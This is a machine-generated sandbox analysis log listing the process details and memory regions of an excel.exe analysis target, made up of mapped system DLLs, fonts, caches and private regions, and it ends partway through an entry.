# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 10:56:24.882 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\excel.exe" page_root = "0x36c71000" os_pid = "0x12e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 269 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 270 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 271 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 272 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 273 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 274 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 275 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 276 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 277 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 278 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 279 start_va = 0x680000 end_va = 0x681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 280 start_va = 0x690000 end_va = 0x693fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 281 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 282 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 283 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 284 start_va = 0x7f0000 end_va = 0x81dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 285 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 286 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 287 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 288 start_va = 0x850000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 289 start_va = 0x890000 end_va = 0x893fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 290 start_va = 0x8a0000 end_va = 0x8a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 291 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 292 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 293 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 294 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 295 start_va = 0xbf0000 end_va = 0xda8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 296 start_va = 0xdb0000 end_va = 0xdb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 297 start_va = 0xdc0000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 298 start_va = 0xde0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 299 start_va = 0xee0000 end_va = 0xf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 300 start_va = 0xf20000 end_va = 0xf20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 301 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 302 start_va = 0xf40000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 303 start_va = 0xf80000 end_va = 0x2957fff monitored = 0 entry_point = 0xf81000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\excel.exe") Region: id = 304 start_va = 0x2960000 end_va = 0x3d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 305 start_va = 0x3d60000 end_va = 0x4067fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 306 start_va = 0x4070000 end_va = 0x4990fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 307 start_va = 0x49a0000 end_va = 0x97defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 308 start_va = 0x97e0000 end_va = 0xa812fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\xlintl32.dll") Region: id = 309 start_va = 0xa820000 end_va = 0xa91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a820000" filename = "" Region: id = 310 start_va = 0xa920000 end_va = 0xa9dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a920000" filename = "" Region: id = 311 start_va = 0xa9e0000 end_va = 0xaadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a9e0000" filename = "" Region: id = 312 start_va = 0xaae0000 end_va = 0xae16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 313 start_va = 0xae20000 end_va = 0xaf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae20000" filename = "" Region: id = 314 start_va = 0xaf20000 end_va = 0xb01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af20000" filename = "" Region: id = 315 start_va = 0xb020000 end_va = 0xb05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b020000" filename = "" Region: id = 316 start_va = 0xb060000 end_va = 0xb15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b060000" filename = "" Region: id = 317 start_va = 0xb160000 end_va = 0xb651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 318 start_va = 0xb660000 end_va = 0xb660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b660000" filename = "" Region: id = 319 start_va = 0xb670000 end_va = 0xb67efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 320 start_va = 0xb680000 end_va = 0xb6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b680000" filename = "" Region: id = 321 start_va = 0xb6c0000 end_va = 0xb7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6c0000" filename = "" Region: id = 322 start_va = 0xb7c0000 end_va = 0xb934fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 323 start_va = 0xb940000 end_va = 0xb940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b940000" filename = "" Region: id = 324 start_va = 0xb950000 end_va = 0xb953fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b950000" filename = "" Region: id = 325 start_va = 0xb960000 end_va = 0xb96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b960000" filename = "" Region: id = 326 start_va = 0xb970000 end_va = 0xb9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b970000" filename = "" Region: id = 327 start_va = 0xb9b0000 end_va = 0xbaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9b0000" filename = "" Region: id = 328 start_va = 0xbab0000 end_va = 0xbaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 329 start_va = 0xbaf0000 end_va = 0xbb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000baf0000" filename = "" Region: id = 330 start_va = 0xbb30000 end_va = 0xbb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bb30000" filename = "" Region: id = 331 start_va = 0xbb40000 end_va = 0xbb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bb40000" filename = "" Region: id = 332 start_va = 0xbb50000 end_va = 0xbb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb50000" filename = "" Region: id = 333 start_va = 0xbb90000 end_va = 0xbb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bb90000" filename = "" Region: id = 334 start_va = 0xbba0000 end_va = 0xbbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bba0000" filename = "" Region: id = 335 start_va = 0xbbb0000 end_va = 0xc3affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bbb0000" filename = "" Region: id = 336 start_va = 0xc3b0000 end_va = 0xc4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3b0000" filename = "" Region: id = 337 start_va = 0xc4b0000 end_va = 0xc5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c4b0000" filename = "" Region: id = 338 start_va = 0xc5b0000 end_va = 0xc6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c5b0000" filename = "" Region: id = 339 start_va = 0xc6b0000 end_va = 0xc6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c6b0000" filename = "" Region: id = 340 start_va = 0xc6f0000 end_va = 0xc7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c6f0000" filename = "" Region: id = 341 start_va = 0xc7f0000 end_va = 0xc7f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7f0000" filename = "" Region: id = 342 start_va = 0xc800000 end_va = 0xc800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c800000" filename = "" Region: id = 343 start_va = 0xc810000 end_va = 0xc810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c810000" filename = "" Region: id = 344 start_va = 0xc820000 end_va = 0xc89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c820000" filename = "" Region: id = 345 start_va = 0xc8a0000 end_va = 0xc8a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 346 start_va = 0xc8b0000 end_va = 0xc8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8b0000" filename = "" Region: id = 347 start_va = 0xc8c0000 end_va = 0xc8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8c0000" filename = "" Region: id = 348 start_va = 0xc8d0000 end_va = 0xc8d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8d0000" filename = "" Region: id = 349 start_va = 0xc8e0000 end_va = 0xcadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8e0000" filename = "" Region: id = 350 start_va = 0xcae0000 end_va = 0xcb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cae0000" filename = "" Region: id = 351 start_va = 0xcb20000 end_va = 0xcc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb20000" filename = "" Region: id = 352 start_va = 0xcc20000 end_va = 0xcc23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 353 start_va = 0xcc30000 end_va = 0xcc43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 354 start_va = 0xcc50000 end_va = 0xcc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc50000" filename = "" Region: id = 355 start_va = 0xcc60000 end_va = 0xcc63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 356 start_va = 0xcc70000 end_va = 0xccaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc70000" filename = "" Region: id = 357 start_va = 0xccb0000 end_va = 0xcdaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ccb0000" filename = "" Region: id = 358 start_va = 0xcdb0000 end_va = 0xce8bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 359 start_va = 0xce90000 end_va = 0xcea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 360 start_va = 0xceb0000 end_va = 0xceb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ceb0000" filename = "" Region: id = 361 start_va = 0xcec0000 end_va = 0xcec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cec0000" filename = "" Region: id = 362 start_va = 0xced0000 end_va = 0xced0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ced0000" filename = "" Region: id = 363 start_va = 0xcee0000 end_va = 0xcf28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 364 start_va = 0xcf30000 end_va = 0xd02ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 365 start_va = 0xd030000 end_va = 0xe02ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 366 start_va = 0xe030000 end_va = 0xe82ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 367 start_va = 0xe830000 end_va = 0xe90efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 368 start_va = 0xe910000 end_va = 0xe951fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 369 start_va = 0xe960000 end_va = 0xed5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e960000" filename = "" Region: id = 370 start_va = 0xed60000 end_va = 0xedc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\shell32.dll.mui") Region: id = 371 start_va = 0xedd0000 end_va = 0xee14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 372 start_va = 0xee20000 end_va = 0xee3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee20000" filename = "" Region: id = 373 start_va = 0xee40000 end_va = 0xee5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee40000" filename = "" Region: id = 374 start_va = 0xee60000 end_va = 0xee60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee60000" filename = "" Region: id = 375 start_va = 0xee70000 end_va = 0xee7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee70000" filename = "" Region: id = 376 start_va = 0xee80000 end_va = 0xee8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee80000" filename = "" Region: id = 377 start_va = 0xee90000 end_va = 0xee93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 378 start_va = 0xeea0000 end_va = 0xf29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eea0000" filename = "" Region: id = 379 start_va = 0xf2a0000 end_va = 0xf373fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuil.ttf" filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf") Region: id = 380 start_va = 0xf380000 end_va = 0xf462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 381 start_va = 0xf470000 end_va = 0xf47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f470000" filename = "" Region: id = 382 start_va = 0xf480000 end_va = 0xf48ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f480000" filename = "" Region: id = 383 start_va = 0xf490000 end_va = 0xf49ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f490000" filename = "" Region: id = 384 start_va = 0xf4a0000 end_va = 0xf8adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4a0000" filename = "" Region: id = 385 start_va = 0xf8b0000 end_va = 0xfcb8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f8b0000" filename = "" Region: id = 386 start_va = 0xfcc0000 end_va = 0x100c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fcc0000" filename = "" Region: id = 387 start_va = 0x100d0000 end_va = 0x100d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100d0000" filename = "" Region: id = 388 start_va = 0x100e0000 end_va = 0x100e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100e0000" filename = "" Region: id = 389 start_va = 0x100f0000 end_va = 0x1012ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100f0000" filename = "" Region: id = 390 start_va = 0x10130000 end_va = 0x1022ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010130000" filename = "" Region: id = 391 start_va = 0x10230000 end_va = 0x102affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010230000" filename = "" Region: id = 392 start_va = 0x102b0000 end_va = 0x102c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 393 start_va = 0x102d0000 end_va = 0x1130ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 394 start_va = 0x11310000 end_va = 0x11333fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011310000" filename = "" Region: id = 395 start_va = 0x11340000 end_va = 0x117fcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011340000" filename = "" Region: id = 396 start_va = 0x11800000 end_va = 0x11cbcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011800000" filename = "" Region: id = 397 start_va = 0x11cc0000 end_va = 0x11cc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cc0000" filename = "" Region: id = 398 start_va = 0x11cd0000 end_va = 0x11cd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011cd0000" filename = "" Region: id = 399 start_va = 0x11ce0000 end_va = 0x11d6dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 400 start_va = 0x11d70000 end_va = 0x11e45fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011d70000" filename = "" Region: id = 401 start_va = 0x11e50000 end_va = 0x11e5bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e50000" filename = "" Region: id = 402 start_va = 0x11e60000 end_va = 0x11e6cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\comdlg32.dll.mui") Region: id = 403 start_va = 0x11e70000 end_va = 0x11e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e70000" filename = "" Region: id = 404 start_va = 0x11e80000 end_va = 0x11e88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 405 start_va = 0x11e90000 end_va = 0x11ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 406 start_va = 0x11ed0000 end_va = 0x11ed7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 407 start_va = 0x11ee0000 end_va = 0x11f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ee0000" filename = "" Region: id = 408 start_va = 0x11f20000 end_va = 0x11f20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 409 start_va = 